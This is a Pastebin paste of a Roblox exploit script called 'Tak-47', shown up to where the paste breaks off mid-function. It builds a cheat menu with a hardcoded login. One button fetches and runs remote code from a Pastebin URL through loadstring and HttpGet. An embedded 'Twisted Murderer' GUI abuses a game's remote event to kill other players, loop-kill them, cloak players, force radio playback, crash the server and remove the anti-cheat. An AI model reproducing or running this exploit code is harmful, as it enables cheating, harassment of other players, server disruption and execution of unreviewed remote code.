Advertisement
Modder29000

Tak-47

Apr 7th, 2018
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 57.42 KB | None | 0 0
  1. -- Farewell infortality
  2. -- Revamp by ImFrostic, Version 2.8
  3.  
  4. -- Objects
  5.  
  6. local Tak47 = Instance.new("ScreenGui")
  7. local LoginFrame = Instance.new("Frame")
  8. local Username = Instance.new("TextBox")
  9. local Bar1 = Instance.new("TextLabel")
  10. local Password = Instance.new("TextBox")
  11. local Login = Instance.new("TextButton")
  12. local MainFrame = Instance.new("Frame")
  13. local Bar1_2 = Instance.new("TextLabel")
  14. local Scripts = Instance.new("TextButton")
  15. local Execute = Instance.new("TextButton")
  16. local credits = Instance.new("TextLabel")
  17. local Exit = Instance.new("TextButton")
  18. local ScriptsFrame = Instance.new("Frame")
  19. local Bar1_3 = Instance.new("TextLabel")
  20. local Exit_2 = Instance.new("TextButton")
  21. local ScrollingFrame = Instance.new("ScrollingFrame")
  22. local RoseHub = Instance.new("TextButton")
  23. local TwistedmurdererGui = Instance.new("TextButton")
  24. local JailbreakMoneyFarm = Instance.new("TextButton")
  25. local TreasureHuntSimulatorRainbow = Instance.new("TextButton")
  26.  
  27. -- Properties
  28.  
  29. Tak47.Name = "Tak-47"
  30. Tak47.Parent = game.CoreGui
  31.  
  32. LoginFrame.Name = "LoginFrame"
  33. LoginFrame.Parent = Tak47
  34. LoginFrame.Active = true
  35. LoginFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  36. LoginFrame.ClipsDescendants = true
  37. LoginFrame.Position = UDim2.new(0.0582031161, 0, 0.147921756, 0)
  38. LoginFrame.Selectable = true
  39. LoginFrame.Size = UDim2.new(0, 281, 0, 410)
  40.  
  41. Username.Name = "Username"
  42. Username.Parent = LoginFrame
  43. Username.BackgroundColor3 = Color3.new(1, 1, 1)
  44. Username.BorderSizePixel = 0
  45. Username.Position = UDim2.new(0, 0, 0.251219511, 0)
  46. Username.Size = UDim2.new(0, 281, 0, 29)
  47. Username.Font = Enum.Font.SciFi
  48. Username.Text = "Username"
  49. Username.TextColor3 = Color3.new(0.333333, 1, 1)
  50. Username.TextScaled = true
  51. Username.TextSize = 14
  52. Username.TextWrapped = true
  53.  
  54. Bar1.Name = "Bar1"
  55. Bar1.Parent = LoginFrame
  56. Bar1.BackgroundColor3 = Color3.new(1, 1, 1)
  57. Bar1.Position = UDim2.new(0, 0, 0.0658536553, 0)
  58. Bar1.Size = UDim2.new(0, 281, 0, 36)
  59. Bar1.Font = Enum.Font.SourceSans
  60. Bar1.Text = "Tak-47"
  61. Bar1.TextColor3 = Color3.new(0, 0.333333, 1)
  62. Bar1.TextScaled = true
  63. Bar1.TextSize = 14
  64. Bar1.TextWrapped = true
  65.  
  66. Password.Name = "Password"
  67. Password.Parent = LoginFrame
  68. Password.BackgroundColor3 = Color3.new(1, 1, 1)
  69. Password.BorderSizePixel = 0
  70. Password.Position = UDim2.new(0, 0, 0.531707346, 0)
  71. Password.Size = UDim2.new(0, 281, 0, 29)
  72. Password.Font = Enum.Font.SciFi
  73. Password.Text = "Password"
  74. Password.TextColor3 = Color3.new(0.333333, 1, 1)
  75. Password.TextScaled = true
  76. Password.TextSize = 14
  77. Password.TextWrapped = true
  78.  
  79. Login.Name = "Login"
  80. Login.Parent = LoginFrame
  81. Login.BackgroundColor3 = Color3.new(1, 1, 1)
  82. Login.BorderSizePixel = 0
  83. Login.Position = UDim2.new(0, 0, 0.819512188, 0)
  84. Login.Size = UDim2.new(0, 281, 0, 37)
  85. Login.Font = Enum.Font.SourceSans
  86. Login.Text = "Login"
  87. Login.TextColor3 = Color3.new(0.333333, 1, 1)
  88. Login.TextScaled = true
  89. Login.TextSize = 14
  90. Login.TextWrapped = true
  91.  
  92.  
  93. Login.MouseButton1Down:connect(function()
  94.  
  95. if Username.Text == "ILovingGames" and Password.Text == "LovingHacking" then
  96. LoginFrame.Visible = false
  97. MainFrame.Visible = true
  98. --i will make a actual login next part
  99. end)
  100.  
  101. MainFrame.Name = "MainFrame"
  102. MainFrame.Parent = Tak47
  103. MainFrame.Active = true
  104. MainFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  105. MainFrame.ClipsDescendants = true
  106. MainFrame.Position = UDim2.new(0.180078134, 0, 0.224938869, 0)
  107. MainFrame.Selectable = true
  108. MainFrame.Size = UDim2.new(0, 490, 0, 300)
  109.  
  110. Bar1_2.Name = "Bar1"
  111. Bar1_2.Parent = MainFrame
  112. Bar1_2.BackgroundColor3 = Color3.new(1, 1, 1)
  113. Bar1_2.Position = UDim2.new(0, 0, 0.12166667, 0)
  114. Bar1_2.Size = UDim2.new(0, 490, 0, 36)
  115. Bar1_2.Font = Enum.Font.SourceSans
  116. Bar1_2.Text = "Tak-47"
  117. Bar1_2.TextColor3 = Color3.new(0, 0.333333, 1)
  118. Bar1_2.TextScaled = true
  119. Bar1_2.TextSize = 14
  120. Bar1_2.TextWrapped = true
  121.  
  122. Scripts.Parent = MainFrame
  123. Scripts.BackgroundColor3 = Color3.new(1, 1, 1)
  124. Scripts.BorderSizePixel = 0
  125. Scripts.Position = UDim2.new(0.016326528, 0, 0.466666669, 0)
  126. Scripts.Size = UDim2.new(0, 200, 0, 50)
  127. Scripts.Font = Enum.Font.Code
  128. Scripts.Text = "Scripts"
  129. Scripts.TextColor3 = Color3.new(0.333333, 1, 1)
  130. Scripts.TextScaled = true
  131. Scripts.TextSize = 14
  132. Scripts.TextWrapped = true
  133.  
  134. Execute.Parent = MainFrame
  135. Execute.BackgroundColor3 = Color3.new(1, 1, 1)
  136. Execute.BorderSizePixel = 0
  137. Execute.Position = UDim2.new(0.5734694, 0, 0.466666669, 0)
  138. Execute.Size = UDim2.new(0, 200, 0, 50)
  139. Execute.Font = Enum.Font.Code
  140. Execute.Text = "Execute"
  141. Execute.TextColor3 = Color3.new(0.333333, 1, 1)
  142. Execute.TextScaled = true
  143. Execute.TextSize = 14
  144. Execute.TextWrapped = true
  145. Execute.MouseButton1Down:connect(function()
  146. MainFrame.Visible = false
  147. ScriptsFrame.Visible = true
  148. end)
  149.  
  150. credits.Name = "credits"
  151. credits.Parent = MainFrame
  152. credits.BackgroundColor3 = Color3.new(1, 1, 1)
  153. credits.BorderSizePixel = 0
  154. credits.Position = UDim2.new(0.693877578, 0, 0.910000026, 0)
  155. credits.Size = UDim2.new(0, 150, 0, 27)
  156. credits.Font = Enum.Font.SourceSans
  157. credits.Text = "Credits"
  158. credits.TextColor3 = Color3.new(0, 0.333333, 1)
  159. credits.TextScaled = true
  160. credits.TextSize = 14
  161. credits.TextWrapped = true
  162.  
  163. Exit.Name = "Exit"
  164. Exit.Parent = MainFrame
  165. Exit.BackgroundColor3 = Color3.new(1, 1, 1)
  166. Exit.BorderSizePixel = 0
  167. Exit.Position = UDim2.new(0.879591823, 0, 0, 0)
  168. Exit.Size = UDim2.new(0, 59, 0, 29)
  169. Exit.Modal = true
  170. Exit.Font = Enum.Font.SourceSans
  171. Exit.Text = "Exit"
  172. Exit.TextScaled = true
  173. Exit.TextSize = 14
  174. Exit.TextWrapped = true
  175. Exit.MouseButton1Down:connect(function()
  176. Tak47:Destroy()
  177. end)
  178.  
  179. ScriptsFrame.Name = "ScriptsFrame"
  180. ScriptsFrame.Parent = Tak47
  181. ScriptsFrame.Active = true
  182. ScriptsFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  183. ScriptsFrame.ClipsDescendants = true
  184. ScriptsFrame.Position = UDim2.new(0.395703107, 0, 0.201711476, 0)
  185. ScriptsFrame.Selectable = true
  186. ScriptsFrame.Size = UDim2.new(0, 265, 0, 337)
  187.  
  188. Bar1_3.Name = "Bar1"
  189. Bar1_3.Parent = ScriptsFrame
  190. Bar1_3.BackgroundColor3 = Color3.new(1, 1, 1)
  191. Bar1_3.Position = UDim2.new(0, 0, 0.12462908, 0)
  192. Bar1_3.Size = UDim2.new(0, 265, 0, 36)
  193. Bar1_3.Font = Enum.Font.SourceSans
  194. Bar1_3.Text = "Tak-47"
  195. Bar1_3.TextColor3 = Color3.new(0, 0.333333, 1)
  196. Bar1_3.TextScaled = true
  197. Bar1_3.TextSize = 14
  198. Bar1_3.TextWrapped = true
  199.  
  200. Exit_2.Name = "Exit"
  201. Exit_2.Parent = ScriptsFrame
  202. Exit_2.BackgroundColor3 = Color3.new(1, 1, 1)
  203. Exit_2.BorderSizePixel = 0
  204. Exit_2.Position = UDim2.new(0.790306091, 0, 0, 0)
  205. Exit_2.Size = UDim2.new(0, 59, 0, 29)
  206. Exit_2.Modal = true
  207. Exit_2.Font = Enum.Font.SourceSans
  208. Exit_2.Text = "Exit"
  209. Exit_2.TextScaled = true
  210. Exit_2.TextSize = 14
  211. Exit_2.TextWrapped = true
  212.  
  213. ScrollingFrame.Parent = ScriptsFrame
  214. ScrollingFrame.BackgroundColor3 = Color3.new(1, 1, 1)
  215. ScrollingFrame.Position = UDim2.new(0.0679245293, 0, 0.258160233, 0)
  216. ScrollingFrame.Size = UDim2.new(0, 230, 0, 241)
  217.  
  218. RoseHub.Name = "Rose Hub"
  219. RoseHub.Parent = ScrollingFrame
  220. RoseHub.BackgroundColor3 = Color3.new(1, 1, 1)
  221. RoseHub.Size = UDim2.new(0, 230, 0, 50)
  222. RoseHub.Font = Enum.Font.SourceSans
  223. RoseHub.Text = "Rose Hub"
  224. RoseHub.TextColor3 = Color3.new(0.333333, 1, 1)
  225. RoseHub.TextScaled = true
  226. RoseHub.TextSize = 14
  227. RoseHub.TextWrapped = true
  228. RoseHub.MouseButton1Down:connect(function()
  229. loadstring(game:HttpGet(('https://pastebin.com/raw/F0Gr8XuL'),true))()
  230. end)
  231.  
  232. TwistedmurdererGui.Name = "Twisted murderer Gui"
  233. TwistedmurdererGui.Parent = ScrollingFrame
  234. TwistedmurdererGui.BackgroundColor3 = Color3.new(1, 1, 1)
  235. TwistedmurdererGui.Position = UDim2.new(0, 0, 0.0912863091, 0)
  236. TwistedmurdererGui.Size = UDim2.new(0, 230, 0, 50)
  237. TwistedmurdererGui.Font = Enum.Font.SourceSans
  238. TwistedmurdererGui.Text = "Twisted murderer Gui"
  239. TwistedmurdererGui.TextColor3 = Color3.new(0.333333, 1, 1)
  240. TwistedmurdererGui.TextScaled = true
  241. TwistedmurdererGui.TextSize = 14
  242. TwistedmurdererGui.TextWrapped = true
  243. TwistedmurdererGui.MouseButton1Down:connect(function()
  244. -- MADE BY SOCK TAN
  245.  
  246. -- Objects
  247.  
  248. local TwistedMurdererGUI = Instance.new("ScreenGui")
  249. local Opening = Instance.new("Frame")
  250. local OpenGui = Instance.new("TextButton")
  251. local TMGui = Instance.new("Frame")
  252. local TMGUICRED = Instance.new("TextLabel")
  253. local CLOSE = Instance.new("TextButton")
  254. local PlayersTab = Instance.new("Frame")
  255. local INFO = Instance.new("TextLabel")
  256. local UnCloak = Instance.new("TextButton")
  257. local UnCloakAll = Instance.new("TextButton")
  258. local RRadios = Instance.new("TextButton")
  259. local CrashS = Instance.new("TextButton")
  260. local God = Instance.new("TextButton")
  261. local RemoveAnti = Instance.new("TextButton")
  262. local STOPALL = Instance.new("TextButton")
  263. local STOP = Instance.new("TextButton")
  264. local DetectRoles = Instance.new("TextButton")
  265. local PlayerName = Instance.new("TextBox")
  266. local PLAYALL = Instance.new("TextButton")
  267. local PLAY = Instance.new("TextButton")
  268. local MUSICid = Instance.new("TextBox")
  269. local KillOthers = Instance.new("TextButton")
  270. local KillAll = Instance.new("TextButton")
  271. local Kill = Instance.new("TextButton")
  272. local LoopKill = Instance.new("TextButton")
  273. local ForceKevlar = Instance.new("TextButton")
  274. local CloakAll = Instance.new("TextButton")
  275. local Cloak = Instance.new("TextButton")
  276. local ToolName = Instance.new("TextBox")
  277. local SaveTool = Instance.new("TextButton")
  278. local StayL = Instance.new("TextButton")
  279.  
  280. -- Properties
  281.  
  282. TwistedMurdererGUI.Name = "TwistedMurdererGUI"
  283. TwistedMurdererGUI.Parent = game.CoreGui
  284.  
  285. Opening.Name = "Opening"
  286. Opening.Parent = TwistedMurdererGUI
  287. Opening.Active = true
  288. Opening.BackgroundColor3 = Color3.new(1, 1, 1)
  289. Opening.Size = UDim2.new(0, 89, 0, 27)
  290.  
  291. OpenGui.Name = "OpenGui"
  292. OpenGui.Parent = Opening
  293. OpenGui.BackgroundColor3 = Color3.new(0, 0, 0)
  294. OpenGui.BackgroundTransparency = 1
  295. OpenGui.BorderColor3 = Color3.new(0, 0, 0)
  296. OpenGui.Size = UDim2.new(0, 71, 0, 27)
  297. OpenGui.Font = Enum.Font.SourceSans
  298. OpenGui.FontSize = Enum.FontSize.Size18
  299. OpenGui.Text = "Open"
  300. OpenGui.TextColor3 = Color3.new(0, 0, 0)
  301. OpenGui.TextSize = 18
  302.  
  303. TMGui.Name = "TMGui"
  304. TMGui.Parent = TwistedMurdererGUI
  305. TMGui.Active = true
  306. TMGui.BackgroundColor3 = Color3.new(1, 1, 1)
  307. TMGui.Draggable = true
  308. TMGui.Position = UDim2.new(0, 18, 0, 35)
  309. TMGui.Size = UDim2.new(0, 264, 0, 264)
  310. TMGui.Visible = false
  311.  
  312. TMGUICRED.Name = "TMGUI CRED"
  313. TMGUICRED.Parent = TMGui
  314. TMGUICRED.BackgroundColor3 = Color3.new(1, 1, 1)
  315. TMGUICRED.BackgroundTransparency = 1
  316. TMGUICRED.BorderColor3 = Color3.new(0, 0, 0)
  317. TMGUICRED.Size = UDim2.new(0, 240, 0, 18)
  318. TMGUICRED.Font = Enum.Font.SourceSans
  319. TMGUICRED.FontSize = Enum.FontSize.Size18
  320. TMGUICRED.Text = "Twisted Murderer Gui - MADE BY Sock Tan"
  321. TMGUICRED.TextColor3 = Color3.new(0, 0, 0)
  322. TMGUICRED.TextSize = 15
  323.  
  324. CLOSE.Name = "CLOSE"
  325. CLOSE.Parent = TMGui
  326. CLOSE.BackgroundColor3 = Color3.new(0, 0, 0)
  327. CLOSE.BackgroundTransparency = 0.89999997615814
  328. CLOSE.Position = UDim2.new(0, 243, 0, 0)
  329. CLOSE.Size = UDim2.new(0, 21, 0, 17)
  330. CLOSE.Font = Enum.Font.SourceSans
  331. CLOSE.FontSize = Enum.FontSize.Size24
  332. CLOSE.Text = "X"
  333. CLOSE.TextColor3 = Color3.new(1, 0, 0)
  334. CLOSE.TextSize = 20
  335.  
  336. PlayersTab.Name = "PlayersTab"
  337. PlayersTab.Parent = TMGui
  338. PlayersTab.Active = true
  339. PlayersTab.BackgroundColor3 = Color3.new(1, 1, 1)
  340. PlayersTab.Position = UDim2.new(0, 0, 0, 22)
  341. PlayersTab.Size = UDim2.new(0, 264, 0, 242)
  342.  
  343. INFO.Name = "INFO"
  344. INFO.Parent = PlayersTab
  345. INFO.BackgroundColor3 = Color3.new(1, 1, 1)
  346. INFO.BorderColor3 = Color3.new(1, 1, 1)
  347. INFO.Position = UDim2.new(0, 87, 0, 196)
  348. INFO.Size = UDim2.new(0, 146, 0, 13)
  349. INFO.Font = Enum.Font.SourceSans
  350. INFO.FontSize = Enum.FontSize.Size14
  351. INFO.Text = "<-- Spam this heaps to crash."
  352. INFO.TextSize = 14
  353.  
  354. UnCloak.Name = "UnCloak"
  355. UnCloak.Parent = PlayersTab
  356. UnCloak.BackgroundColor3 = Color3.new(1, 1, 1)
  357. UnCloak.Position = UDim2.new(0, 72, 0, 95)
  358. UnCloak.Size = UDim2.new(0, 60, 0, 21)
  359. UnCloak.Font = Enum.Font.SourceSans
  360. UnCloak.FontSize = Enum.FontSize.Size14
  361. UnCloak.Text = "UnCloak"
  362. UnCloak.TextSize = 14
  363.  
  364. UnCloakAll.Name = "UnCloakAll"
  365. UnCloakAll.Parent = PlayersTab
  366. UnCloakAll.BackgroundColor3 = Color3.new(1, 1, 1)
  367. UnCloakAll.Position = UDim2.new(0, 202, 0, 95)
  368. UnCloakAll.Size = UDim2.new(0, 60, 0, 21)
  369. UnCloakAll.Font = Enum.Font.SourceSans
  370. UnCloakAll.FontSize = Enum.FontSize.Size14
  371. UnCloakAll.Text = "UnCloakAll"
  372. UnCloakAll.TextSize = 14
  373.  
  374. RRadios.Name = "RRadios"
  375. RRadios.Parent = PlayersTab
  376. RRadios.BackgroundColor3 = Color3.new(1, 1, 1)
  377. RRadios.Position = UDim2.new(0, 6, 0, 218)
  378. RRadios.Size = UDim2.new(0, 200, 0, 16)
  379. RRadios.Font = Enum.Font.SourceSans
  380. RRadios.FontSize = Enum.FontSize.Size14
  381. RRadios.Text = "Remove Everyones Radio Permanently"
  382. RRadios.TextSize = 14
  383.  
  384. CrashS.Name = "CrashS"
  385. CrashS.Parent = PlayersTab
  386. CrashS.BackgroundColor3 = Color3.new(1, 1, 1)
  387. CrashS.Position = UDim2.new(0, 6, 0, 193)
  388. CrashS.Size = UDim2.new(0, 74, 0, 20)
  389. CrashS.Font = Enum.Font.SourceSans
  390. CrashS.FontSize = Enum.FontSize.Size14
  391. CrashS.Text = "Crash Server"
  392. CrashS.TextSize = 14
  393.  
  394. God.Name = "God"
  395. God.Parent = PlayersTab
  396. God.BackgroundColor3 = Color3.new(1, 1, 1)
  397. God.Position = UDim2.new(0, 6, 0, 167)
  398. God.Size = UDim2.new(0, 45, 0, 21)
  399. God.Font = Enum.Font.SourceSans
  400. God.FontSize = Enum.FontSize.Size14
  401. God.Text = "God"
  402. God.TextSize = 14
  403.  
  404. RemoveAnti.Name = "RemoveAnti"
  405. RemoveAnti.Parent = PlayersTab
  406. RemoveAnti.BackgroundColor3 = Color3.new(1, 1, 1)
  407. RemoveAnti.Position = UDim2.new(0, 154, 0, 6)
  408. RemoveAnti.Size = UDim2.new(0, 104, 0, 19)
  409. RemoveAnti.Font = Enum.Font.SourceSans
  410. RemoveAnti.FontSize = Enum.FontSize.Size14
  411. RemoveAnti.Text = "Remove Anti-Cheat"
  412. RemoveAnti.TextSize = 14
  413.  
  414. STOPALL.Name = "STOPALL"
  415. STOPALL.Parent = PlayersTab
  416. STOPALL.BackgroundColor3 = Color3.new(1, 0, 0)
  417. STOPALL.Position = UDim2.new(0, 61, 0, 73)
  418. STOPALL.Size = UDim2.new(0, 46, 0, 17)
  419. STOPALL.Font = Enum.Font.SourceSans
  420. STOPALL.FontSize = Enum.FontSize.Size14
  421. STOPALL.Text = "STOP ALL"
  422. STOPALL.TextSize = 14
  423.  
  424. STOP.Name = "STOP"
  425. STOP.Parent = PlayersTab
  426. STOP.BackgroundColor3 = Color3.new(1, 0, 0)
  427. STOP.Position = UDim2.new(0, 61, 0, 51)
  428. STOP.Size = UDim2.new(0, 37, 0, 17)
  429. STOP.Font = Enum.Font.SourceSans
  430. STOP.FontSize = Enum.FontSize.Size14
  431. STOP.Text = "STOP"
  432. STOP.TextSize = 14
  433.  
  434. DetectRoles.Name = "DetectRoles"
  435. DetectRoles.Parent = PlayersTab
  436. DetectRoles.BackgroundColor3 = Color3.new(1, 1, 1)
  437. DetectRoles.Position = UDim2.new(0, 154, 0, 30)
  438. DetectRoles.Size = UDim2.new(0, 104, 0, 19)
  439. DetectRoles.Font = Enum.Font.SourceSans
  440. DetectRoles.FontSize = Enum.FontSize.Size14
  441. DetectRoles.Text = "Detect Roles"
  442. DetectRoles.TextSize = 14
  443.  
  444. PlayerName.Name = "PlayerName"
  445. PlayerName.Parent = PlayersTab
  446. PlayerName.BackgroundColor3 = Color3.new(1, 1, 1)
  447. PlayerName.Position = UDim2.new(0, 6, 0, 28)
  448. PlayerName.Size = UDim2.new(0, 95, 0, 18)
  449. PlayerName.Font = Enum.Font.SourceSans
  450. PlayerName.FontSize = Enum.FontSize.Size14
  451. PlayerName.Text = "PLAYER NAME"
  452. PlayerName.TextSize = 14
  453.  
  454. PLAYALL.Name = "PLAYALL"
  455. PLAYALL.Parent = PlayersTab
  456. PLAYALL.BackgroundColor3 = Color3.new(0, 0.666667, 0)
  457. PLAYALL.Position = UDim2.new(0, 6, 0, 73)
  458. PLAYALL.Size = UDim2.new(0, 46, 0, 17)
  459. PLAYALL.Font = Enum.Font.SourceSans
  460. PLAYALL.FontSize = Enum.FontSize.Size14
  461. PLAYALL.Text = "PLAY ALL"
  462. PLAYALL.TextSize = 14
  463.  
  464. PLAY.Name = "PLAY"
  465. PLAY.Parent = PlayersTab
  466. PLAY.BackgroundColor3 = Color3.new(0, 0.666667, 0)
  467. PLAY.Position = UDim2.new(0, 7, 0, 51)
  468. PLAY.Size = UDim2.new(0, 37, 0, 17)
  469. PLAY.Font = Enum.Font.SourceSans
  470. PLAY.FontSize = Enum.FontSize.Size14
  471. PLAY.Text = "PLAY"
  472. PLAY.TextSize = 14
  473.  
  474. MUSICid.Name = "MUSICid"
  475. MUSICid.Parent = PlayersTab
  476. MUSICid.BackgroundColor3 = Color3.new(1, 1, 1)
  477. MUSICid.Position = UDim2.new(0, 6, 0, 6)
  478. MUSICid.Size = UDim2.new(0, 95, 0, 18)
  479. MUSICid.Font = Enum.Font.SourceSans
  480. MUSICid.FontSize = Enum.FontSize.Size14
  481. MUSICid.Text = "MUSIC ID"
  482. MUSICid.TextSize = 14
  483.  
  484. KillOthers.Name = "KillOthers"
  485. KillOthers.Parent = PlayersTab
  486. KillOthers.BackgroundColor3 = Color3.new(1, 1, 1)
  487. KillOthers.Position = UDim2.new(0, 125, 0, 142)
  488. KillOthers.Size = UDim2.new(0, 54, 0, 20)
  489. KillOthers.Font = Enum.Font.SourceSans
  490. KillOthers.FontSize = Enum.FontSize.Size14
  491. KillOthers.Text = "Kill Others"
  492. KillOthers.TextSize = 14
  493.  
  494. KillAll.Name = "KillAll"
  495. KillAll.Parent = PlayersTab
  496. KillAll.BackgroundColor3 = Color3.new(1, 1, 1)
  497. KillAll.Position = UDim2.new(0, 66, 0, 142)
  498. KillAll.Size = UDim2.new(0, 54, 0, 20)
  499. KillAll.Font = Enum.Font.SourceSans
  500. KillAll.FontSize = Enum.FontSize.Size14
  501. KillAll.Text = "Kill All"
  502. KillAll.TextSize = 14
  503.  
  504. Kill.Name = "Kill"
  505. Kill.Parent = PlayersTab
  506. Kill.BackgroundColor3 = Color3.new(1, 1, 1)
  507. Kill.Position = UDim2.new(0, 6, 0, 142)
  508. Kill.Size = UDim2.new(0, 54, 0, 20)
  509. Kill.Font = Enum.Font.SourceSans
  510. Kill.FontSize = Enum.FontSize.Size14
  511. Kill.Text = "Kill"
  512. Kill.TextSize = 14
  513.  
  514. LoopKill.Name = "LoopKill"
  515. LoopKill.Parent = PlayersTab
  516. LoopKill.BackgroundColor3 = Color3.new(1, 1, 1)
  517. LoopKill.Position = UDim2.new(0, 184, 0, 142)
  518. LoopKill.Size = UDim2.new(0, 54, 0, 20)
  519. LoopKill.Font = Enum.Font.SourceSans
  520. LoopKill.FontSize = Enum.FontSize.Size14
  521. LoopKill.Text = "LoopKil"
  522. LoopKill.TextSize = 14
  523.  
  524. ForceKevlar.Name = "ForceKevlar"
  525. ForceKevlar.Parent = PlayersTab
  526. ForceKevlar.BackgroundColor3 = Color3.new(1, 1, 1)
  527. ForceKevlar.Position = UDim2.new(0, 6, 0, 121)
  528. ForceKevlar.Size = UDim2.new(0, 126, 0, 16)
  529. ForceKevlar.Font = Enum.Font.SourceSans
  530. ForceKevlar.FontSize = Enum.FontSize.Size14
  531. ForceKevlar.Text = "Force Kevlar"
  532. ForceKevlar.TextSize = 14
  533.  
  534. CloakAll.Name = "CloakAll"
  535. CloakAll.Parent = PlayersTab
  536. CloakAll.BackgroundColor3 = Color3.new(1, 1, 1)
  537. CloakAll.Position = UDim2.new(0, 137, 0, 95)
  538. CloakAll.Size = UDim2.new(0, 60, 0, 21)
  539. CloakAll.Font = Enum.Font.SourceSans
  540. CloakAll.FontSize = Enum.FontSize.Size14
  541. CloakAll.Text = "CloakAll"
  542. CloakAll.TextSize = 14
  543.  
  544. Cloak.Name = "Cloak"
  545. Cloak.Parent = PlayersTab
  546. Cloak.BackgroundColor3 = Color3.new(1, 1, 1)
  547. Cloak.Position = UDim2.new(0, 6, 0, 95)
  548. Cloak.Size = UDim2.new(0, 60, 0, 21)
  549. Cloak.Font = Enum.Font.SourceSans
  550. Cloak.FontSize = Enum.FontSize.Size14
  551. Cloak.Text = "Cloak"
  552. Cloak.TextSize = 14
  553.  
  554. ToolName.Name = "ToolName"
  555. ToolName.Parent = PlayersTab
  556. ToolName.BackgroundColor3 = Color3.new(1, 1, 1)
  557. ToolName.Position = UDim2.new(0, 132, 0, 54)
  558. ToolName.Size = UDim2.new(0, 69, 0, 19)
  559. ToolName.Font = Enum.Font.SourceSans
  560. ToolName.FontSize = Enum.FontSize.Size14
  561. ToolName.Text = "Tool Name"
  562. ToolName.TextSize = 14
  563.  
  564. SaveTool.Name = "SaveTool"
  565. SaveTool.Parent = PlayersTab
  566. SaveTool.BackgroundColor3 = Color3.new(1, 1, 1)
  567. SaveTool.Position = UDim2.new(0, 206, 0, 54)
  568. SaveTool.Size = UDim2.new(0, 54, 0, 19)
  569. SaveTool.Font = Enum.Font.SourceSans
  570. SaveTool.FontSize = Enum.FontSize.Size14
  571. SaveTool.Text = "Save Tool"
  572. SaveTool.TextSize = 14
  573.  
  574. StayL.Name = "StayL"
  575. StayL.Parent = PlayersTab
  576. StayL.BackgroundColor3 = Color3.new(1, 1, 1)
  577. StayL.Position = UDim2.new(0, 97, 0, 169)
  578. StayL.Size = UDim2.new(0, 139, 0, 20)
  579. StayL.Font = Enum.Font.SourceSans
  580. StayL.FontSize = Enum.FontSize.Size14
  581. StayL.Text = "Stay In Lobby Next Round"
  582. StayL.TextSize = 14
  583.  
  584.  
  585. OpenGui.MouseButton1Down:connect(function()
  586. game.CoreGui.TwistedMurdererGUI.Opening.Visible = false
  587. game.CoreGui.TwistedMurdererGUI.TMGui.Visible = true
  588. end)
  589.  
  590. CLOSE.MouseButton1Down:connect(function()
  591. game.CoreGui.TwistedMurdererGUI.Opening.Visible = true
  592. game.CoreGui.TwistedMurdererGUI.TMGui.Visible = false
  593. end)
  594.  
  595. PLAY.MouseButton1Down:connect(function()
  596. game.ReplicatedStorage.Event:FireServer("PlayRadio", game.Players[PlayerName.Text], MUSICid.Text)
  597. end)
  598.  
  599. STOP.MouseButton1Down:connect(function()
  600. game.ReplicatedStorage.Event:FireServer("StopRadio", game.Players[PlayerName.Text])
  601. end)
  602.  
  603. Cloak.MouseButton1Down:connect(function()
  604. game.ReplicatedStorage.Event:FireServer("Cloak", game.Workspace.Ignore.Players[PlayerName.Text])
  605. end)
  606.  
  607. UnCloak.MouseButton1Down:connect(function()
  608. game.ReplicatedStorage.Event:FireServer("UnCloak", game.Workspace.Ignore.Players[PlayerName.Text])
  609. end)
  610.  
  611. CloakAll.MouseButton1Down:connect(function()
  612. for i,v in pairs(game.Players:GetChildren()) do
  613. game.ReplicatedStorage.Event:FireServer("Cloak", game.Workspace.Ignore.Players[v.Name])
  614. end
  615. end)
  616.  
  617. ForceKevlar.MouseButton1Down:connect(function()
  618. game.ReplicatedStorage.Event:FireServer("TPD", -100, game.Workspace.Ignore.Players[PlayerName.Text].Humanoid)
  619. end)
  620.  
  621. PLAYALL.MouseButton1Down:connect(function()
  622. for i,v in pairs(game.Players:GetChildren()) do
  623. game.ReplicatedStorage.Event:FireServer("PlayRadio", v, MUSICid.Text)
  624. end
  625. end)
  626.  
  627. STOPALL.MouseButton1Down:connect(function()
  628. for i,v in pairs(game.Players:GetChildren()) do
  629. game.ReplicatedStorage.Event:FireServer("StopRadio", v)
  630. end
  631. end)
  632.  
  633. Kill.MouseButton1Down:connect(function()
  634. game.ReplicatedStorage.Event:FireServer("TPD", 20000, game.Workspace.Ignore.Players[PlayerName.Text].Humanoid)
  635. end)
  636.  
  637. KillAll.MouseButton1Down:connect(function()
  638. for i,v in pairs(game.Players:GetChildren()) do
  639. game.ReplicatedStorage.Event:FireServer("TPD", 20000, game.Workspace.Ignore.Players[v.Name].Humanoid)
  640. end
  641. end)
  642.  
  643. KillOthers.MouseButton1Down:connect(function()
  644. for i,v in pairs(game.Players:GetChildren()) do
  645. game.ReplicatedStorage.Event:FireServer("TPD", -20000, game.Workspace.Ignore.Players[PlayerName.Text].Humanoid)
  646. game.ReplicatedStorage.Event:FireServer("TPD", 20000, game.Workspace.Ignore.Players[v.Name].Humanoid)
  647. end
  648. end)
  649.  
  650. SaveTool.MouseButton1Down:connect(function()
  651. game.Players.LocalPlayer.Backpack[ToolName.Text].Parent = game.Players.LocalPlayer.StarterGear
  652. end)
  653.  
  654. UnCloakAll.MouseButton1Down:connect(function()
  655. for i,v in pairs(game.Players:GetChildren()) do
  656. game.ReplicatedStorage.Event:FireServer("UnCloak", game.Workspace.Ignore.Players[v.Name])
  657. end
  658. end)
  659.  
  660. LoopKill.MouseButton1Down:connect(function()
  661. while true do
  662. wait(1.5)
  663. game.ReplicatedStorage.Event:FireServer("TPD", 20000, game.Workspace.Ignore.Players[PlayerName.Text].Humanoid)
  664. end
  665. end)
  666.  
  667. DetectRoles.MouseButton1Down:connect(function()
  668. while wait(1) do
  669. for i,v in pairs(game.Players:GetChildren()) do
  670. if game.Players[v.Name].Character:FindFirstChild("Role") then
  671. local role = game.Players[v.Name].Character:FindFirstChild("Role")
  672. if role.Value == "Murderer" then
  673. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 0, 0)
  674. elseif role.Value == "Sheriff" then
  675. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(1, 170/255, 0)
  676. elseif role.Value == "Innocent" then
  677. game.CoreGui.RobloxGui.PlayerListContainer.ScrollList[v.Name].BGFrame.PlayerName.TextColor3 = Color3.new(0, 1, 0)
  678. else
